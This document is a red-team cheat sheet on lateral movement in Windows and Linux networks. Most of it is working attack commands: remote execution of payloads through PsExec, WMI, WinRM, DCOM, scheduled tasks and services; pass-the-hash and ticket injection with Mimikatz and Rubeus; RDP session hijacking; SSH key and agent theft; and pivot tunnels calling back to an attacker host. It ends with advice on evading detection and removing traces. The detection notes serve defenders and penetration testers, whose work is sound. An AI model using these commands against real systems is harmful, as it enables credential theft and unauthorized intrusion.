โ† All cheat sheets

LATERAL-MOVEMENT

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

Lateral movement is the process of moving through a network after initial
compromise to access additional systems and data. This cheatsheet covers
Windows and Linux techniques with practical commands for red team operations.

WINDOWS LATERAL MOVEMENT#


    

PSEXEC#

Uses SMB (TCP 445) to upload a service binary and execute it remotely.
Requires local admin on the target.

  # Sysinternals PsExec
  psexec.exe \\TARGET -u DOMAIN\user -p password cmd.exe

  # Impacket psexec (creates a service, uploads binary)
  psexec.py DOMAIN/user:password@TARGET
  psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

  # Impacket smbexec (no binary upload, uses cmd.exe output redirect)
  smbexec.py DOMAIN/user:password@TARGET

  # Metasploit
  use exploit/windows/smb/psexec
  set SMBUser user
  set SMBPass password

  Detection: Service creation (Event 7045), SMB file write, process lineage

WMI (WINDOWS MANAGEMENT INSTRUMENTATION)#

Uses DCOM (TCP 135 + dynamic ports). Does not write to disk by default.
Requires local admin on the target.

  # wmic command
  wmic /node:TARGET /user:DOMAIN\user /password:pass process call create "cmd.exe /c whoami > C:\output.txt"

  # Impacket wmiexec (semi-interactive shell via WMI)
  wmiexec.py DOMAIN/user:password@TARGET
  wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

  # PowerShell WMI
  Invoke-WmiMethod -ComputerName TARGET -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c payload.exe" -Credential $cred

  # CIM (modern replacement for WMI)
  Invoke-CimMethod -ComputerName TARGET -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="payload.exe"} -Credential $cred

  Detection: WMI event logs (5857-5861), process creation with WmiPrvSE.exe parent

WINRM (WINDOWS REMOTE MANAGEMENT)#

Uses HTTP (TCP 5985) or HTTPS (TCP 5986). Native Windows remote management.
Requires membership in Remote Management Users or local admin.

  # PowerShell Remoting
  Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user
  Invoke-Command -ComputerName TARGET -ScriptBlock {whoami} -Credential $cred
  Invoke-Command -ComputerName TARGET -FilePath C:\local\script.ps1

  # Evil-WinRM (supports hash, key auth, file operations)
  evil-winrm -i TARGET -u user -p password
  evil-winrm -i TARGET -u user -H NTLM_HASH
  evil-winrm -i TARGET -u user -k  # Kerberos auth

  # CrackMapExec
  crackmapexec winrm TARGET -u user -p password -x "whoami"

  Detection: Event 4624 (Type 3), Event 91 (WSMan), PowerShell script block logging

DCOM (DISTRIBUTED COMPONENT OBJECT MODEL)#

Uses TCP 135 + dynamic ports. Various COM objects can execute commands.
Requires local admin on the target.

  # Impacket dcomexec
  dcomexec.py DOMAIN/user:password@TARGET
  dcomexec.py -object MMC20 DOMAIN/user:password@TARGET

  # PowerShell - MMC20.Application
  $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
  $com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c payload.exe","7")

  # PowerShell - ShellWindows
  $com = [activator]::CreateInstance([type]::GetTypeFromProgID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
  $com.item().Document.Application.ShellExecute("cmd.exe","/c payload.exe","C:\Windows\System32",$null,0)

  Detection: DCOM event logs, unusual parent process (mmc.exe, explorer.exe)

RDP (REMOTE DESKTOP PROTOCOL)#

Uses TCP 3389. Interactive GUI access. Most "legitimate-looking" lateral movement.

  # Standard RDP
  xfreerdp /u:user /p:password /v:TARGET /dynamic-resolution
  mstsc.exe /v:TARGET

  # RDP Hijacking (requires SYSTEM privileges)
  # List sessions
  query user /server:TARGET
  # Hijack disconnected session (no password needed if SYSTEM)
  tscon <SESSION_ID> /dest:rdp-tcp#0

  # SharpRDP (authenticated command execution over RDP)
  SharpRDP.exe computername=TARGET command="cmd /c payload.exe" username=DOMAIN\user password=pass

  # Restricted Admin Mode (pass-the-hash over RDP)
  # Must be enabled on target
  reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0
  sekurlsa::pth /user:admin /domain:TARGET /ntlm:HASH "/run:mstsc.exe /restrictedadmin"

  Detection: Event 4624 (Type 10), Event 1149 (RDP connect), network traffic

SCHEDULED TASKS#

Uses RPC/DCOM. Creates a scheduled task remotely for execution.

  # schtasks
  schtasks /create /s TARGET /u DOMAIN\user /p password /tn "Update" /tr "C:\payload.exe" /sc once /st 00:00 /ru SYSTEM
  schtasks /run /s TARGET /tn "Update"
  schtasks /delete /s TARGET /tn "Update" /f

  # Impacket atexec
  atexec.py DOMAIN/user:password@TARGET "whoami"

  Detection: Event 4698 (task created), Event 4702 (task updated), process lineage

SERVICE CREATION#

Uses SMB (TCP 445) and SCM. Creates/modifies a Windows service remotely.

  # sc.exe
  sc \\TARGET create SvcName binPath= "C:\payload.exe" start= auto
  sc \\TARGET start SvcName
  sc \\TARGET delete SvcName

  # PowerShell
  Invoke-Command -ComputerName TARGET -ScriptBlock {New-Service -Name SvcName -BinaryPathName "C:\payload.exe"}

  Detection: Event 7045 (service installed), Event 4697, process lineage

PASS-THE-HASH (PTH)#

Use NTLM hash directly for authentication without knowing the plaintext password.
Only works with NTLM authentication (not Kerberos).

  # Impacket
  psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
  wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
  smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

  # CrackMapExec
  crackmapexec smb TARGET -u user -H NTLM_HASH
  crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami"

  # Mimikatz (spawn process with alternate credentials)
  sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:cmd.exe

  # Evil-WinRM
  evil-winrm -i TARGET -u user -H NTLM_HASH

  Detection: Event 4624 (Type 3, NtLmSsp), unusual NTLM auth patterns

PASS-THE-TICKET (PTT)#

Inject a stolen Kerberos ticket into the current session.

  # Mimikatz - export tickets
  sekurlsa::tickets /export
  # Inject ticket
  kerberos::ptt ticket.kirbi

  # Rubeus
  Rubeus.exe ptt /ticket:ticket.kirbi
  Rubeus.exe ptt /ticket:base64_ticket

  # Linux (ccache format)
  export KRB5CCNAME=/path/to/ticket.ccache
  psexec.py -k -no-pass DOMAIN/user@TARGET

  Detection: Event 4768/4769 anomalies, TGT reuse from different IPs

OVERPASS-THE-HASH#

Use NTLM hash to request a Kerberos TGT, then use Kerberos auth.
Avoids NTLM-based detection.

  # Mimikatz
  sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe
  # Then in the new shell, Kerberos tickets are automatically requested

  # Rubeus
  Rubeus.exe asktgt /user:user /rc4:NTLM_HASH /ptt
  Rubeus.exe asktgt /user:user /aes256:AES_KEY /ptt /opsec

  Detection: Event 4768 (RC4 encryption, unusual source)

TOKEN IMPERSONATION#

Steal or impersonate tokens from other processes for privilege escalation
or lateral movement.

  # Cobalt Strike
  beacon> steal_token <PID>
  beacon> make_token DOMAIN\user password
  beacon> rev2self

  # Metasploit Incognito
  meterpreter> use incognito
  meterpreter> list_tokens -u
  meterpreter> impersonate_token "DOMAIN\\user"

  # Windows native
  # Requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege

  Detection: Event 4624 (Type 9 NewCredentials), token-related API calls

LINUX LATERAL MOVEMENT#


    

SSH#

  # Standard SSH
  ssh user@TARGET
  ssh -i id_rsa user@TARGET

  # SSH with password (sshpass)
  sshpass -p 'password' ssh user@TARGET

  # SSH key theft and reuse
  find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
  cat /home/*/.ssh/authorized_keys
  cat /home/*/.ssh/known_hosts    # discover additional targets

  # SSH agent forwarding hijack
  # Find SSH agent sockets
  find /tmp -name "agent.*" 2>/dev/null
  SSH_AUTH_SOCK=/tmp/ssh-XXXXX/agent.YYYY ssh user@TARGET

SSH TUNNELING#

  # Local port forward (access TARGET:PORT through SSH host)
  ssh -L LOCAL_PORT:TARGET:REMOTE_PORT user@PIVOT_HOST

  # Remote port forward (expose local service through SSH host)
  ssh -R REMOTE_PORT:127.0.0.1:LOCAL_PORT user@PIVOT_HOST

  # Dynamic SOCKS proxy
  ssh -D 1080 user@PIVOT_HOST
  # Then configure proxychains: socks5 127.0.0.1 1080

  # SSH over SSH (multi-hop)
  ssh -J user@PIVOT1 user@TARGET
  ssh -o ProxyCommand="ssh -W %h:%p user@PIVOT1" user@TARGET

PROXYCHAINS#

  # Configure /etc/proxychains4.conf
  # socks5 127.0.0.1 1080

  # Run tools through proxy
  proxychains nmap -sT -Pn TARGET
  proxychains crackmapexec smb TARGET -u user -p pass
  proxychains evil-winrm -i TARGET -u user -p pass

SOCAT#

  # Port forwarding
  socat TCP-LISTEN:8080,fork TCP:TARGET:80

  # Encrypted relay
  socat TCP-LISTEN:443,reuseaddr,fork OPENSSL:TARGET:443,verify=0

  # Bidirectional relay
  socat TCP-LISTEN:1234,fork TCP:TARGET:4321

CHISEL#

  # Server (attacker)
  chisel server --reverse --port 8080

  # Client (pivot host)
  chisel client ATTACKER:8080 R:socks

  # Reverse port forward
  chisel client ATTACKER:8080 R:9090:TARGET:80

LIGOLO-NG#

  # Proxy (attacker)
  ligolo-proxy -selfcert -laddr 0.0.0.0:11601

  # Agent (pivot host)
  ligolo-agent -connect ATTACKER:11601 -ignore-cert

  # Add route on attacker
  sudo ip route add 10.10.0.0/24 dev ligolo

  # Start tunnel
  ligolo> session
  ligolo> start

OPSEC CONSIDERATIONS#

  - WMI and DCOM are less noisy than PsExec (no file write)
  - Use Kerberos over NTLM when possible (blends with normal traffic)
  - Overpass-the-hash avoids NTLM monitoring
  - RDP leaves fewer forensic artifacts than remote execution
  - Clean up scheduled tasks and services after use
  - Use encrypted channels for pivoting (SSH, Chisel, Ligolo)
  - Avoid scanning entire subnets; target specific hosts
  - Use native protocols matching the target environment
  - Monitor your own artifacts and clean up on exit